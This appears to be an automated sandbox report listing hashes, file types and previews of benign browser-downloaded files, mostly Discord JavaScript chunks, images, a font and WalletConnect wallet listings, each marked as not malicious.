                                                                          SSDEEP:192:MPc2uG99SlhMwNqx97KHeKVtBAyfzBD2m67bDiCWBTYz:MZSpDHtF7CqYz
                                                                          MD5:597EA58E25651A7E25B338E9010CCBE8
                                                                          SHA1:672ACA6E2E41D448400704598673662C614ED353
                                                                          SHA-256:A4D47EAEDF384EB30C943A55AEAA4E6526EE627EEC7FD479AE18AC2416F0D9BF
                                                                          SHA-512:1765D75FD35140A4455FE1BCFBB3BD4F0DB864B152F7EA5E9A266CD39FDAEABD8CFA37F445F3310FD4DEB859D7C1625A994CE596D1E77A2D278EAED546E52B9B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/63550.a619020e4c7b3d5be7ac.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["63550"],{310013:function(t,e,n){"use strict";var o={childContextTypes:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,mixins:!0,propTypes:!0,type:!0},r={name:!0,length:!0,prototype:!0,caller:!0,arguments:!0,arity:!0},i="function"==typeof Object.getOwnPropertySymbols;t.exports=function(t,e,n){if("string"!=typeof e){var s=Object.getOwnPropertyNames(e);i&&(s=s.concat(Object.getOwnPropertySymbols(e)));for(var h=0;h<s.length;++h)if(!o[s[h]]&&!r[s[h]]&&(!n||!n[s[h]]))try{t[s[h]]=e[s[h]]}catch(t){}}return t}},6268:function(t,e,n){n("70102"),n("424973"),!function(t,e){"use strict";if("IntersectionObserver"in t&&"IntersectionObserverEntry"in t&&"intersectionRatio"in t.IntersectionObserverEntry.prototype){!("isIntersecting"in t.IntersectionObserverEntry.prototype)&&Object.defineProperty(t.IntersectionObserverEntry.prototype,"isIntersecting",{get:function(){return this.intersectionRatio>0}});return}var n=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (18420)
                                                                          Category:downloaded
                                                                          Size (bytes):18475
                                                                          Entropy (8bit):5.212326974532302
                                                                          Encrypted:false
                                                                          SSDEEP:384:pm7zNhWDkO3Ga7LFS/74ZjURX+0C6TK6sYY:pgZwP3XkkjUj32p
                                                                          MD5:5C6249FADADCF61985346CFE7E1B7245
                                                                          SHA1:0CD8C3CADD55DEA165B09B350937732C9C63081F
                                                                          SHA-256:79F170C6631891285F067A393D02BDC4AA9E270C83C2C0FC144882FAEAEB71F2
                                                                          SHA-512:2C7647F8A60F356E43788353CA3AEECC052674F8B2ECD09F990B063B1FE34F5798AF6B1E047D2DFB09A6817AAF0EF3896BC2BB58CFF3DA8DE604102B9E21EF9F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/22918.9f2b9d54bbfc371a4d92.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22918"],{516555:function(t,e,n){"use strict";n.r(e),n.d(e,{ConfettiCanvas:function(){return V},Environment:function(){return d},SpriteCanvas:function(){return P},useConfettiCannon:function(){return F}}),n("70102"),n("222007"),n("424973");var i=n("884691"),r=n("748820"),a=n("414456"),o=n.n(a);function u(t,e){var n=t.x,i=t.y;return n>e.x&&n<e.x+e.width&&i>e.y&&i<e.y+e.height}function l(t,e){return t*e*e*(e>0?-1:1)}var c=function(){function t(t){this.id=t.id,this.position=t.position,this.velocity=t.velocity,this.rotation=t.rotation,this.dragCoefficient=t.dragCoefficient,this.size=t.size,this.opacity=t.opacity,this.spriteX=t.spriteX,this.spriteY=t.spriteY,this.spriteWidth=t.spriteWidth,this.spriteHeight=t.spriteHeight,this._lastUpdatedAt=Date.now()}return t.prototype.getNewForces=function(t,e){var n,i,r,a,o=t.wind*e,u=-t.gravity*e;return{x:o+(n=this.dragCoefficient.x,n*(i=this.velocity.x)*i*(i>0?-1:1)),y:u+(r=this.drag
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):4284
                                                                          Entropy (8bit):5.068004594395453
                                                                          Encrypted:false
                                                                          SSDEEP:48:838LFtY0tlpv3QvuyAYyk6XmuTFJAUaAh+sPD+xG6v9IHitfRFWlDOVSBJrHSMKv:lL4AJI8F/96ciJM92pJpezQaJliHH
                                                                          MD5:8498EF6B6A0B65F3012DC76763BFAAA3
                                                                          SHA1:A5C7EED96CF325A94F4E3A3380C87685690E0A3D
                                                                          SHA-256:66940264B4D917832D08B8080B677A308DF6621210813A0B84EFFB7A544117DC
                                                                          SHA-512:46FFA1A294DDC5A54A46FF71A6E4CBF4760DFDC9E278C37092C1F53FF745D8B182BBF9211ADB0DD9DD0C2A8839FD1E934895D9AA51AF6CDE3A1CA8119C855B5A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/parseGridNftDataToCanvas.worker.js
                                                                          Preview:const decoder = new TextDecoder();..const numberPerGroup = 32;.const emptyHex4 = '0000';..self.onmessage = function (evt) {. var buffers = evt.data.buffers;.. var colorIndexPreprocessed = evt.data.colorIndexPreprocessed;. var colorIndexes = JSON.parse(decoder.decode(evt.data.encodedColorIndex));.. var pixelGroups = JSON.parse(decoder.decode(evt.data.encodedPixelGroups));.. var imageDataBuffer = new Uint32Array(buffers[0]);. var getPixelColourValueForBuffer = getColourForEndianType(. evt.data.isLittleEndian. );.. var colourList = colorIndexPreprocessed. ? processRgb565ColorIndexData(colorIndexes). : processRawColorIndexData(colorIndexes);.. var currentPixelGroup;. var groupSplitIndex = 0;. var currentRgb888Pixel;. var currentPixelColourIndex;. var index;.. for (var i = 0, n = pixelGroups.length; i < n; i++) {. // current group of 32 pixels (slice to shave off the '0x' at the start). currentPixelGroup = leftPad(pixelGroups[i].hex, 64).slice(2);. groupSplit
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):13475
                                                                          Entropy (8bit):7.9581003729969115
                                                                          Encrypted:false
                                                                          SSDEEP:384:r+4jOLjbxDX8d9gUJPt4dtyNtROcrx5Cj:q4jQbxDsdvPtemi
                                                                          MD5:91556C4BEE7F8EFAD523EC7B99EBCABC
                                                                          SHA1:F44FE2E9A9D6BBA255495F1DBD925EEBADCFEA28
                                                                          SHA-256:FEAE54E6C738A566D3E00AEC80056414A92397D6436AA75F1E36166B8B7C381D
                                                                          SHA-512:40A5FD65C9A2CA8BDE5AC53D98865C40AF2B50E96F3945D614A440F722F57E58C090BFF216730A89FF25B63264DF4CEC6D3CAE03548E413AD9C6D6F16B650012
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...|U...o..B.2.CHnn6...--...j.2...X+C.$.l..@...e%....D.:k.[..[..B.*K.W.{?..s.9'g<g.}...y..qr.7.......9....".~I..;...4/...rmGj.L..Z .BA)~.@."..k(OG..|Z*...B.d........k.+...s,;......5._....k.gA....bJ....AS.6W..49hf.-h..+../....*.0.k@g..E.A....4........[.........X.M...|..-../..<.u..t..8~.Ryas.j&.qA.l...c..x:......N....)l.!..@.&\.......\..x.B.5....6....hn......<'n."t..g.6...,..B..Cr.e..B......+/&L....gs3.:.."d..(!..I. ,....x-....y\.....h. k9..A...........[J.`...S...IN.,...NU...WO.....A.,.\..N..x.s.v.B.{N.q.6.|..6..i...B..e9.......v..].8'.f.6G...f6.s..7 ,..z..A%......<..f..Y.....*...........q.uv...Fyas.>.As.Xi.i...y...f... A.q.6'!............H.5..\."xVBl..k...0..l<...d<`......l.@.....]..\.N.....g3.B9].1h..v...)Kv e..J.J....Z......)|\.9p;y^..t*....R...l<......Qt^y.]V.Gg......:.C+.u\y..U...1.J5...O....v...^uB..V..6lV]..4!..$..)..Q.1k.D..`.9..0+{..d..1cP.F.*......1|Na.:1.......B.3
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):688
                                                                          Entropy (8bit):4.422809447424027
                                                                          Encrypted:false
                                                                          SSDEEP:12:t6AbzVKIh4zXvVg/jzDJU0uE2pLAZTX9D1jPb1qcNRxU7EK53TQke:tDbzVKwkXveLPC0uWZjR1LhFFkxhe
                                                                          MD5:C6CE0010471B65C0FAEDA6C53AB297BD
                                                                          SHA1:8735052DE92D694B4EA91CECCAB0E7E8F75A3CC7
                                                                          SHA-256:862046FEE1B4F3744F000347CC0B337871967B2BD9471BCB6DDED2A49A61C527
                                                                          SHA-512:7A054A7E19F80F7735CCDBC13E9CAFA13A779764C1725161B4EC7D3C793CFFB2E56C61109AA5F09A21E9DE3FD46B2E2EC756A6B03E46F4760125D282C14273C4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/3205da2e8f78633583d0.svg
                                                                          Preview:<svg fill="none" height="12" viewBox="0 0 13 12" width="13" xmlns="http://www.w3.org/2000/svg"><path d="m5.39011.540027c.35536-.720037 1.38211-.720036 1.73747.000002l1.18359 2.398201c.14111.28593.41388.48411.72942.52996l2.64661.38457c.7946.11546 1.1119 1.09196.5369 1.65243l-1.9151 1.86674c-.2283.22257-.33252.54323-.2786.8575l.4521 2.63587c.1357.7914-.69496 1.3949-1.40567 1.0213l-2.36717-1.2445c-.28223-.1484-.6194-.1484-.90162 0l-2.36717 1.2445c-.71072.3736-1.54138-.2299-1.40565-1.0213l.45209-2.63587c.0539-.31427-.05029-.63493-.27861-.8575l-1.915083-1.86674c-.574984-.56047-.2576998-1.53697.536908-1.65243l2.646575-.38457c.31554-.04585.58831-.24403.72943-.52996z" fill="#fff"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (15643)
                                                                          Category:downloaded
                                                                          Size (bytes):15698
                                                                          Entropy (8bit):5.475693923712616
                                                                          Encrypted:false
                                                                          SSDEEP:192:J9BDBrp29b6G1miDgDsiRT4BRQYp0tCgzfOLkHzf5rE7wbZTtkamjCbxgf:JZ32mpMHpBi9E7wltkaWCbxgf
                                                                          MD5:E889F804C915F5278E961CDE93D50E20
                                                                          SHA1:25E94C62CCA79BFABA361E27E49CC687E72B74DD
                                                                          SHA-256:F3649BEEBF41954E8E4ACEED2D74C5FCC81A61E1123B4190EFA9A02F785977FD
                                                                          SHA-512:A808003CC8088CD6521002C01DA250E3A63111042004B590C4D8AAD8640AA82650218391545005C2326022D6644A8EB8675A7C74DF3FC162E975C3C7B20B4572
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/64612.26d2bf1afbde26a43a76.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["64612"],{515631:function(e,t,n){"use strict";n.r(t),n.d(t,{FeedItemInteractionType:function(){return d},GuildFeedSectionTypes:function(){return i},GuildFeedRenderMode:function(){return r},COLLAPSED_SIZE_MEDIA_QUERY:function(){return c},GUILD_FEED_CHANNEL_TYPES:function(){return _},GuildHomeLandingSource:function(){return l}}),n("222007");var d,i,r,l,u,s,a,E,o=n("298386");(u=d||(d={})).MESSAGE_CLICKED="message_clicked",u.MESSAGE_CHANNEL_CLICKED="message_channel_clicked",u.REACTION_ADDED="reaction_added",u.REACTION_REMOVED="reaction_removed",u.THREAD_EMBED_CLICKED="thread_embed_clicked",u.LINK_CLICKED="link_clicked",u.IMAGE_CLICKED="image_clicked",u.BUTTON_CLICKED="button_clicked",u.REFERENCED_MESSAGE_CLICKED="referenced_message_clicked",u.MESSAGED_IN_SIDEBAR="messaged_in_sidebar",u.REPLIED_IN_SIDEBAR="replied_in_sidebar",u.REPLIED_TO_MESSAGE="replied_to_message",u.EXPANDED_ITEM="expanded_item",u.VIEW_MORE_REPLIES="v
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (18014)
                                                                          Category:downloaded
                                                                          Size (bytes):18069
                                                                          Entropy (8bit):5.558042414304943
                                                                          Encrypted:false
                                                                          SSDEEP:384:7XoNfc7YkuZ++ibR4hI4L48Sop4wWt4Oy6p46K4rHbO4DV4rN8KVp43Ws4M44dG4:7XoNU7YkugePiwPNQ//+U3005d2cc2eC
                                                                          MD5:1960CD6AD791E73CDCFAFFF546853923
                                                                          SHA1:0AD17A1E5860279E6885D8D94EE0E29A1730D530
                                                                          SHA-256:13C1C620578FEE12330A7C3C003DA2EA56F487FE471125B76ADD74F74D0BC36C
                                                                          SHA-512:754D285240BA669A2749378252A9909A48B04BAD52CB662E7932029E0A632E46D023E02D6B814217B718588152EDB26D14C66789470030B2BCBAB4EF837C15B1
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/99742.217a8e519977f9b5cbf0.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["99742"],{583367:function(e,t,i){"use strict";i.r(t),i.d(t,{fetchAppliedGuildBoostsForGuild:function(){return d},fetchGuildBoostSlots:function(){return l},applyToGuild:function(){return n},unapplyFromGuild:function(){return E},cancelGuildBoostSlot:function(){return a},uncancelGuildBoostSlot:function(){return S}});var _=i("872717"),s=i("913144"),o=i("448993"),I=i("783111"),u=i("522308"),r=i("521012"),T=i("49111");async function d(e){let t=await _.default.get({url:T.Endpoints.APPLIED_GUILD_BOOSTS_FOR_GUILD(e),oldFormErrors:!0}),i=t.body.map(e=>I.default.createFromServer(e));return s.default.dispatch({type:"GUILD_APPLIED_BOOSTS_FETCH_SUCCESS",guildId:e,appliedBoosts:i}),i}async function l(){let e=await _.default.get({url:T.Endpoints.USER_GUILD_BOOST_SLOTS,oldFormErrors:!0}),t=e.body.map(e=>u.default.createFromServer(e,r.default.getSubscriptionById(e.subscription_id)));return s.default.dispatch({type:"GUILD_BOOST_SLOTS_
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:downloaded
                                                                          Size (bytes):12
                                                                          Entropy (8bit):3.2516291673878226
                                                                          Encrypted:false
                                                                          SSDEEP:3:YMvW6n:YMvRn
                                                                          MD5:3C607E1C1756889D9BE36C56FCB7BF98
                                                                          SHA1:AC3BB6B2469E2F79AE4EC7523ADD3357B7C8FA47
                                                                          SHA-256:53B148F86D9019A9354705AB51E75CB7CF8197233A146388D1D26734F687815B
                                                                          SHA-512:5535682A32206510011A7DAFB3D6E483B815A0154457E1EA705BB83609388DA9AB3D927D59CA97FCE9E6D69F11714458085D0D8993EC7DECFEDD1CE03A957CD8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/init
                                                                          Preview:{"id":11302}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:downloaded
                                                                          Size (bytes):42621
                                                                          Entropy (8bit):5.126034609264039
                                                                          Encrypted:false
                                                                          SSDEEP:384:ImUN4FBqusasgfvCP/F2HCo6q6j50CrlekrHKM1UmmH2:ImUiqusasgfvYfdj59rlekTKM1Hx
                                                                          MD5:67E02B9AB885897D9B64CABDF827B088
                                                                          SHA1:8BA678D9D8E1DCEF80C670F8C3A9A2796B5711F2
                                                                          SHA-256:37F3A5BC356395291764BC34A4D951C9E7D88CE800A1E484E1C8C54C112D3823
                                                                          SHA-512:AA023C05CE1AC583C9E6FD4647365D745A218A5015838F716A8ED921BE171B0C3A7FD50E452D491E285ED414CE5EA28C156E913605D2ED0E7D16C3F88A8106A4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getInjectedListings?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:{"listings":{"c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96":{"id":"c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96","name":"MetaMask","homepage":"https://metamask.io/","image_id":"5195e9db-94d8-4579-6f11-ef553be95100","order":10,"app":{"browser":null,"ios":"https://apps.apple.com/us/app/metamask/id1438144202","android":"https://play.google.com/store/apps/details?id=io.metamask","mac":null,"windows":null,"linux":null,"chrome":"https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn","firefox":"https://addons.mozilla.org/en-US/firefox/addon/ether-metamask/","safari":null,"edge":"https://microsoftedge.microsoft.com/addons/detail/metamask/ejbalbakoplchlghecdalmeeeajnimhm?hl=en-US","opera":"https://addons.opera.com/en-gb/extensions/details/metamask-10/"},"injected":[{"injected_id":"isMetaMask","namespace":"eip155"}],"rdns":"io.metamask","mobile":{"native":"metamask://","universal":"https://metamask.app.link"},"desktop":{"nativ
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 64x64, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                          Category:dropped
                                                                          Size (bytes):870
                                                                          Entropy (8bit):7.787514640500376
                                                                          Encrypted:false
                                                                          SSDEEP:12:kypkAT2iveAYblKasyRAO6EHIdAi1hfVH/CaFHNOXEMvO1PWVIh58FV:WNHRAO6PdAkJ/Tt4O1PQIniV
                                                                          MD5:1FEDED7AF4749EBD4B90668B16E9BACD
                                                                          SHA1:DD2A6080262A0905638163BFD21BE5EDF88D5CA2
                                                                          SHA-256:F8B73B7408BDDDB7A0F88115036245D0B67D5E919EA6BE6B609F578DAB70EFC2
                                                                          SHA-512:14539002FF9FF3041035D5E2BFC140464BB9885700A932D74518CE1A35F7C22932454160FE082B289A39488D4B827F1B3A9BD0A271B4556FDDD7E51DF4EACBE7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:RIFF^...WEBPVP8 R........*@.@.>m..G$".........g......n..+.......'.........F..lF..........W}.=5..6Y.....*\...o.F......N.....K5Y..r.(..u.l.F.]..b..64.{....o..P!......\.0.....[......S....*WX&N..H..l.Ny...M$.@.7.c..oVL....-x'.[..{..T.+.p.w...eE.:..F^.{U.c..z...u..fiq..p.J.....<)n>.&..B4.. ....Z7..Xvq.CF.5.).F..a.c.......;....?~.>......'g.'.._..n..o...|=..RVW.....:u\...6Z.1.<w...~ .S.n{L.....K..N45..'.:..\.).[5.Ka.D.:h...6U..5..((R..........!.^J.@.9...@]..(L.........?l96=.....X.)....l..#........@.o....}.../.....Tj....#.#.-.4;^.....I.u..!.4&sb.......An..|.....;>!Z...(!.....C............tiN....9y...8.........&y.r.!.....^J..[..,.%.y.m..J....\q.s.z.Go.J..+.2..W].0E....r..zhA.G.}.7....1%"..<....*....^..%....E:]>Ft....*O..U.x.>'.......h..{../.+J.kc'........o%.%.m.p.l....$+.i....a-[.d.y.s....`.wC..=.......5$*..#.U...T......;.....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                          Category:dropped
                                                                          Size (bytes):24565
                                                                          Entropy (8bit):6.000976601202208
                                                                          Encrypted:false
                                                                          SSDEEP:384:xakxHbO0x9ipfSEuH44B445H44Q544Aq44Q4P44ZF944Q4Q4424Qb444nxWl444p:xZxH5ripqEuH44B445H44Q544Aq44Q4+
                                                                          MD5:EC2C34CADD4B5F4594415127380A85E6
                                                                          SHA1:E7E129270DA0153510EF04A148D08702B980B679
                                                                          SHA-256:128E20B3B15C65DD470CB9D0DC8FE10E2FF9F72FAC99EE621B01A391EF6B81C7
                                                                          SHA-512:C1997779FF5D0F74A7FBB359606DAB83439C143FBDB52025495BDC3A7CB87188085EAF12CC434CBF63B3F8DA5417C8A03F2E64F751C0A63508E4412EA4E7425C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:............ .h...F... .... .........00.... ..%..V......... ..$...:..(....... ..... ..........................................dX2.dX..dW..dW..dX..dX..dX..dX2.........................dW..dW..dX..eX..eX..eX..eX..eX..eX..dW..dW..dW..............dW..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........dW..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW......dX2.dW..eX..eX..|q......eX..eX..eX..eX......|q..eX..eX..eX..eX2.dW..eX..eX..........................................eX..eX..eW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..............eX..........eX..............eX..eX..dW..dW..eX..eX..........................................eX..eX..dW..dW..eX..eX..~s..................................~s..eX..eX..dW..dW..eX..eX..eX..................................eX..eX..eX..dW..dX2.eX..eX..eX..h[..........{p..{p..........h[..eX..eX..dW..eW2.....dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..........eX..dX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eX..eW..e
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):1609
                                                                          Entropy (8bit):7.800638949259021
                                                                          Encrypted:false
                                                                          SSDEEP:48:OzTW/iDgzdY/6nVt0dNxUaJp1oV5EQTgC86JUKkrMPoYj:8W/ia2SVYNxVgV5EQTgC+rUj
                                                                          MD5:1C2C1C074AFC2568763EF0F2376CF2D1
                                                                          SHA1:2AB4753C1C3677BF56E9603FEF2BE727E8E53AD9
                                                                          SHA-256:13C5CDB561D98E256A0A6DACFC4F71C6539E38ECAED830186678B1627C4A0DAD
                                                                          SHA-512:E118CB6653279B49225A138F3D7CBC28FD393871394B79E0B796EAD375C1832A8CA4D953D2B25A425C83C686E4FE13FE750F2C7FC7B572AE05A43F7B832598A7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=75"
                                                                          Preview:.PNG........IHDR...0...0.....`.......PLTE.........jXH/..|.vWrZ7......~..l\?aM3..x|jO774.......e..r.....{wdE..f.......~vT7+.q`F.......s..P@'~s]dT:.hYZR..aH7"..\R?keO.RM.>;....a..n..ZrkZ../".eO.60.LI......qK.v\.x_.......V.H@...V@.......u.:@......,,,.............()).........|d@%%%..ya>CCB..!..........'///...........$................kT3...iD.. ddd...}}}.................!..P.........Z^.....n...P...ItRNS..............................................._..................`......\.......pHYs.................IDATx...u[.Z..S.FJ..wYl...O.k...M.8........m)....e.Lf....8..........F.....=.....D.a..<r...%`4...lR....i./..m...r.L?..X..}....b.k...3..-...^...U......3.vv..W.J....]Uc..x...f..Rh.......#.-q..8...^....b_.[....R.1. ....B.R9..5...;......8.$K&pU.........i{.41....#2Q-4.....)..|...?...........^kllb......\*..j#.....M'..}..:...[...Z....... h...h ..ut.....v..u.a.7.6.{.p..i.7.L..3..V.#V..j.....#.....3.~.2.Ph%.v.f...5g.u%....9... d.[...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 22644, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):22644
                                                                          Entropy (8bit):7.991943273848092
                                                                          Encrypted:true
                                                                          SSDEEP:384:tLjlIiXBm/u1oT+Jm9msg/up60piBTxjAhuB7BVJmjzfFuHKNc7eZL2:9hc/uyTZ95peA0tBV4jz9jNc7WL2
                                                                          MD5:5BEDBD236ECE6C43BE3BCFA723688DF2
                                                                          SHA1:7A421BB979FA238347A5AF2DEBEC2C6CDE51BBD8
                                                                          SHA-256:2023D1A5C6F3B2B8A7EDD28BAB5579D82B3C1E8D0AAB739E8A13B5BD2C8A5F2B
                                                                          SHA-512:21287577521F99914016A2872FCDCB31CB19FA752C635813602985D497F67CEC0C1E62115A56F03731C940F8972299D4E558B0550F1AFFCC42F03DF83893F622
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://fonts.gstatic.com/s/opensans/v36/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu0SC55K5gw.woff2
                                                                          Preview:wOF2......Xt..........X...........................@..4..X?HVAR.a.`?STAT.$'..."/V....(.R....0..0.6.$..6. ..~..R..%.~....5..2....@..#.m.......".....$["Y.`8....!..H^......Ku.sw.TPTP..t].-X.DQR...2.8Z...g...Kn.C..(x:[.ph7.Yq..3._9.uy.o.>......r........]_r..>.....].....Y..#.B..a...9...I-.45M.J...R.gLa.\.I)g...;....D.eR....f.D..2..\.C...-.[.... ....a...F...h..YT...|....5i..`m...L.5. .4-;....TN......&...._.d....9Z./.....o.@^.G.L:.n...Z.M.....F.'.wH.?.V..........+..7;YC..FL.......O..g.*X%...?............#..6.D......H..I.1i...Z.h.j.(W.....o......DB....$W( c_..eK...a...S+K.....n..;....:...*...g.6.{M...*."c.v.p...x;.ii.."J...h.%@..m+)b1Z...M..7.0....W3...6@}.>.G......k..]C..T..1.......5..wm..k.p...ae..r;.i-[h.K.G(\m........#...L5.%>.(B<.u....:.YE...f9..E...Hy. }CP...7.(.!)eP..sJU..c)......(.p.E.R...]4..D....... ...E............Mk0.C7.*...+.~.."&w.F.....DX....+..S...tN?...(. @..../Y.|..&p.c..1..F}&..r...\.2P....00...h%/2...0}l......&.......m.X%.B.\s..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (16216)
                                                                          Category:downloaded
                                                                          Size (bytes):16271
                                                                          Entropy (8bit):5.604352747672769
                                                                          Encrypted:false
                                                                          SSDEEP:192:RmwwKTS6BFQ4P18yJcZBHoG24daZ/9zMuT8CKonTl/2aG1o80+hbkusYtm6vbAzP:fQcJQBoG2gG/5jKoTZjCXs34LUAUuK
                                                                          MD5:0F8DD32DB95F1471A93FDFE9867F97A5
                                                                          SHA1:48B2F9A5A3AFAC45BE412830A782F03B8145371A
                                                                          SHA-256:F562562E5A2615E4773318748BC111D7E0B683392E495B48EBB451CBE6D6C444
                                                                          SHA-512:BB4A8F42FAFA2A56580D33188C69FF5CAC941A28DFAEF1F68FEF44480A348F41E579C1E0FA0290390879AC44A296113BD5163E1B7AA067B9D6ADE2748F952592
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/96634.924b7b3f0dc4ee21386b.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["96634"],{569272:function(e,t,l){"use strict";l.r(t),l.d(t,{default:function(){return E}});var i=l("872717"),s=l("913144"),n=l("651057"),a=l("299285"),r=l("523086"),u=l("21526"),d=l("659632"),o=l("49111"),c=l("646718"),E={resolveGiftCode:async function e(e){let t=arguments.length>1&&void 0!==arguments[1]&&arguments[1],l=arguments.length>2&&void 0!==arguments[2]&&arguments[2];s.default.dispatch({type:"GIFT_CODE_RESOLVE",code:e});try{let i=await (0,d.resolveGiftCode)(e,t,l);if(null!=i.application_id&&i.application_id!==c.PREMIUM_SUBSCRIPTION_APPLICATION){let e=a.default.getApplication(i.application_id);if(null==e)try{await n.default.fetchApplication(i.application_id)}catch(e){}}if(i.application_id===o.COLLECTIBLES_APPLICATION_ID)try{await (0,u.fetchCollectiblesProduct)(i.sku_id)}catch(e){}return s.default.dispatch({type:"GIFT_CODE_RESOLVE_SUCCESS",giftCode:i}),{giftCode:i}}catch(t){throw s.default.dispatch({type:"GIFT
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:downloaded
                                                                          Size (bytes):13372
                                                                          Entropy (8bit):7.972909971204703
                                                                          Encrypted:false
                                                                          SSDEEP:192:XAi9up1M8QJ8jtyppZo5RaEFmwRXG5xnSa+onkWWWH3Mo0TD8iEU3So:XAqup1xQJgU+raQmOXySxWGowdE8So
                                                                          MD5:86038EA2A6791CD11113D470547E7972
                                                                          SHA1:E63B83A887D6E623949838662B4BC3C4F93FDE94
                                                                          SHA-256:08C2EDC5A337A9567C3F3AAA1633D55CBCFB18A2E244F69426C4A408C24B56C0
                                                                          SHA-512:1D1C369FC606B172646109492FC12F616D8EBF965492A89A9E7B0859F777AA0F28EA0E20FD00E4BA70BDC7AFF0114FB9969708FEDBF5AC2A5746328BE6CCB18C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getWalletImage/7fd5a23a-3a01-4cfb-3c8b-9f43ae414400?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
